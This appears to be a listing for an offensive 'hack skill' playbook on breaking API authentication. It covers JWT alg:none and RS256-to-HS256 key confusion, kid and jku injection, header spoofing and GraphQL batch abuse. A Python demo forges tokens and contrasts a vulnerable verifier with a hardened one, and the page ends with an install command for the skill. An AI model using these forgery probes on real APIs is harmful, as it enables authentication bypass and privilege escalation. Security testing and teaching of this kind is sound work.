Focused playbook for breaking API authentication through JWT manipulation and header spoofing. It walks through token triage: algorithm confusion (alg:none, and RS256 downgraded to HS256 so the published public key becomes the HMAC secret), kid injection, and trust problems in remote key fetching (for example via jku or x5u headers), then pivots to mass-assignment field hunting and rate-limit bypasses via X-Forwarded-For spoofing. The quick attack table is handy for initial probes, and the batch-abuse section covers GraphQL mutation flooding and bulk enumeration patterns. It routes you cleanly to the deeper OAuth and OIDC skills when you hit SSO flows or need full token attack depth. A good first touch when you spot Bearer tokens or API keys and want systematic coverage without overthinking it.
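As an added illustration of the two algorithm-confusion probes named above (this is example code written for this page, not part of the hack-skills repository), the block below builds JWS compact tokens by hand and contrasts a verifier that trusts the token's own alg header with one that pins the algorithm server-side. The secret, the public-key PEM, and the claim values are constructed placeholders; the RS256 path itself is not implemented, because the point is only that the vulnerable verifier reuses whatever key it was handed as an HMAC secret when the header says HS256.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo material; not real keys.
HMAC_SECRET = b"constructed-demo-secret"
RSA_PUBLIC_KEY_PEM = (
    b"-----BEGIN PUBLIC KEY-----\nCONSTRUCTED-PLACEHOLDER\n-----END PUBLIC KEY-----\n"
)


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256(signing_input: bytes, key: bytes) -> bytes:
    return hmac.new(key, signing_input, hashlib.sha256).digest()


def make_token(header: dict, payload: dict, key: bytes = b"") -> str:
    """Build a compact JWS. alg none yields an empty signature segment."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    if header.get("alg") == "none":
        return f"{h}.{p}."
    return f"{h}.{p}.{b64url_encode(hs256(f'{h}.{p}'.encode(), key))}"


def verify_vulnerable(token: str, key: bytes) -> dict:
    """The bug: the algorithm is taken from the attacker-controlled header."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "none":
        return json.loads(b64url_decode(p))  # unsigned token accepted as-is
    if alg == "HS256":
        # Whatever key object the caller passed (even an RSA public key
        # meant for RS256) is used as the HMAC secret.
        if hmac.compare_digest(hs256(f"{h}.{p}".encode(), key), b64url_decode(s)):
            return json.loads(b64url_decode(p))
        raise ValueError("bad signature")
    raise ValueError(f"alg {alg!r} not handled in this example")


def verify_hardened(token: str, key: bytes, expected_alg: str) -> dict:
    """Pins the algorithm server-side; never honours none; requires a signature."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != expected_alg:
        raise ValueError("alg mismatch")
    if expected_alg != "HS256":
        raise ValueError(f"alg {expected_alg!r} not handled in this example")
    if not s or not hmac.compare_digest(hs256(f"{h}.{p}".encode(), key), b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


def alg_none_attack(legit_token: str) -> str:
    """Strip the signature, set alg to none, and elevate the role claim."""
    _, p, _ = legit_token.split(".")
    payload = json.loads(b64url_decode(p))
    payload["role"] = "admin"
    return make_token({"alg": "none", "typ": "JWT"}, payload)


def key_confusion_attack(public_key_pem: bytes, payload: dict) -> str:
    """RS256 -> HS256: sign with HS256 using the server's public key bytes as the secret."""
    return make_token({"alg": "HS256", "typ": "JWT"}, payload, public_key_pem)


def run_demo() -> dict:
    """Run both probes against both verifiers and report the outcomes."""
    results = {}
    legit = make_token({"alg": "HS256", "typ": "JWT"}, {"sub": "alice", "role": "user"}, HMAC_SECRET)

    forged = alg_none_attack(legit)
    results["none_vulnerable"] = verify_vulnerable(forged, HMAC_SECRET)["role"]
    try:
        verify_hardened(forged, HMAC_SECRET, "HS256")
        results["none_hardened"] = "accepted"
    except ValueError:
        results["none_hardened"] = "rejected"

    confused = key_confusion_attack(RSA_PUBLIC_KEY_PEM, {"sub": "alice", "role": "admin"})
    results["confusion_vulnerable"] = verify_vulnerable(confused, RSA_PUBLIC_KEY_PEM)["role"]
    try:
        verify_hardened(confused, RSA_PUBLIC_KEY_PEM, "RS256")
        results["confusion_hardened"] = "accepted"
    except ValueError:
        results["confusion_hardened"] = "rejected"
    return results


if __name__ == "__main__":
    print(run_demo())
```

The probes map directly onto the triage steps: for alg:none, replay a captured token with the third segment emptied and the header rewritten; for key confusion, fetch the server's published RSA public key and use its exact PEM bytes as the HS256 secret. If either forged token is accepted, the verifier is dispatching on the header rather than on a server-side allowlist.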
npx skills add https://github.com/yaklang/hack-skills --skill api-auth-and-jwt-abuse